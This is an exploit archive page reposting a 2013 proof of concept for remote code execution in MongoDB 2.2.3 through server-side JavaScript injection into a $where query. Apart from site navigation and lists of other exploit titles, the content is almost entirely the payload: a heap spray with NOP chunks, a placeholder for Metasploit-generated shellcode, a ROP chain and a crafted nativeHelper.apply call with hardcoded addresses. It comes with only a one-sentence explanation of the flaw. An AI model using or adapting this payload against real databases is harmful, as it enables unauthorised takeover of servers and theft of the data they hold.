首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MongoDB nativeHelper.apply Remote Code Execution
来源:http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji- 作者:agixid 发布时间:2013-04-12  

#Title: MongoDB nativeHelper.apply Remote Code Execution
#Author: agixid http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/
#Software Link: http://fastdl.mongodb.org/linux/mongodb-linux-i686-2.2.3.tgz
#Version: 2.2.3

The following PoC exploits the "nativeHelper" feature in the spidermonkey mongodb implementation.
the NativeFunction "func" come from "x" javascript object and then is called without any check:

db.my_collection.find({'$where':'shellcode=unescape("METASPLOIT JS GENERATED SHELLCODE"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++){ chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"\x26\x18\x35\x08"+"MongoSploit!"+"\x58\x71\x45\x08"+"sthack is a nice place to be"+"\x6c\x5a\x05\x08"+"\x20\x20\x20\x20"+"\x58\x71\x45\x08"]);'})


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ircd-hybrid 8.0.5 Denial Of Se
·Ruby Gem kelredd-pruview 0.3.8
·TRENDNet IP Cam Authentication
·Nagios Remote Plugin Executor
·DLink DIR-645 / DIR-815 diagno
·KNet Web Server 1.04b - Stack
·Adobe ColdFusion APSB13-03 Rem
·AT-TFTP Server 2.0 - Stack Bas
·Linksys WRT54GL apply.cgi Comm
·MinaliC Webserver 2.0.0 - Buff
·BigAnt Server 2.97 - DDNF User
·Ruby Gem md2pdf Command Inject
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved